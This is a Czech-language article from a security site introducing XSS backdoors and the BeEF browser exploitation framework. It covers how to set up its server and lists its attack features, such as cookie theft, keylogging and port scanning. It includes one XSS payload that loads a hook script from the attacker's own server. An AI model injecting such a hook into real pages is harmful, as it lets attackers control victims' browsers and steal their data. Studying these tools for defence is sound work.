XSS backdoory (BeEF)

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: .cCuMiNn.
Datum: 31.3.2011
Hodnocení/Hlasovalo: 1/10

Když jsem před pár lety psal článek věnovaný XSS Proxy, byl vývoj podobných nástrojů ještě v plenkách. Od té doby se toho však hodně změnilo a kromě Proof of Conceptu, který představoval XSS Proxy od Antona Ragera, přibylo mnoho zajímavých aplikací tohoto druhu.

Rozhodl jsem se proto, že vám přinesu sérii článků věnovaných tomuto tématu, v nichž si některé z těchto nástrojů blíže představíme a na závěr také vytvoříme svůj vlastní XSS backdoor.

Samotnou koncepci fungování těchto aplikací nemusím, myslím, dlouze představovat. Věnoval jsem se jí ve svém článku XSS Proxy. Jen ve stručnosti tedy zopakuji, že tyto aplikace umožňují navázat oboustranou komunikaci mezi útočníkem a webovými prohlížeči uživatelů, které jsou napadeny skrz zranitelnost Cross-Site Scripting. Nakažené browsery uživatelů pak pro útočníka představují jakýsi botnet, kde je možné jednotlivým zombiím zadávat příkazy ve formě funkcí JavaScriptu. Z principu fungování HTTP protokolu pak vyplývá, že není možné, aby se útočník připojoval skrz klienta k serverové části aplikace, která by naslouchala u jednotlivých obětí (jako je tomu u běžných backdoorů). Naopak je nutné, aby celá koncepce byla postavena reverzně. U jednotlivých obětí tedy běží klientské části aplikace, které se v pravidelných intervalech připojují na server útočníka, z něhož čtou připravené příkazy.


BeEF

Jedním z nejpropracovanějších nástrojů spadajících do této kategorie je bezesporu Browser Exploitation Framework (BeEF). Serverová část jeho starších verzí běží na PHP bez použití databáze. K jeho implementaci tak stačí pouhé stažení archivu a nakopírování souborů v něm obsažených na svůj webový server, nebo webhosting. K administračnímu rozhraní se pak jednoduše připojíte zadáním adresy http://www.nasserver.cz/beef/ui v browseru. Payload, který je nutné umístit na stránky náchylné na XSS má podobu:

<script src=http://www.nasserver.cz/beef/hook/beefmagic.js.php></script>

nebo jeho obměn v závislosti na nalezené zranitelnosti. Důležité je injektování skriptu beefmagic.js.php do obsahu zranitelné stránky.
V levém panelu administračního rozhraní jsou vidět jednotliví napadení uživatelé (zombie) a v pravém panelu je zobrazen log aktivity. V prostředním panelu si pak můžete nechat zobrazit informace dostupné o dané zombii nebo pomocí formulářů ovládat jednotlivé útočné funkce. Těch BeEF nabízí skutečně obrovské množství. K dispozici máte možnost odeslání alertu a promptu, zjištění obsahu cookie nebo clipboardu, záznam stisknutých kláves, možnost změnit obsah zobrazené webové stránky, detekce pluginů a softwaru, odeslání příkazu JavaScriptu, detekování navštívených webových stránek nebo distribuovaný portscanner. BeEF ovšem disponuje také mnoha exploity, kterými je možné zaútočit na prohlížeče uživatelů skrz jejich známé bezpečnostní díry a tím kompletně ovládnout celý počítač oběti. Mimoto dokáže BeEF spolupracovat také se známým Metasploit Frameworkem.

Vlastností, kterými BeEF disponuje, je ještě mnohem více, a protože se jedná o živý projekt, který je neustále rozšiřován o nové funkce, určitě stojí za vyzkoušení. Jeho novější verze ovšem přešly z php na ruby a využívají databázi SQLite. To znamená, že bude nutné rozjet serverovou část na vlastním serveru, protože jen těžko budete shánět webhosting, který by splňoval uvedené požadavky.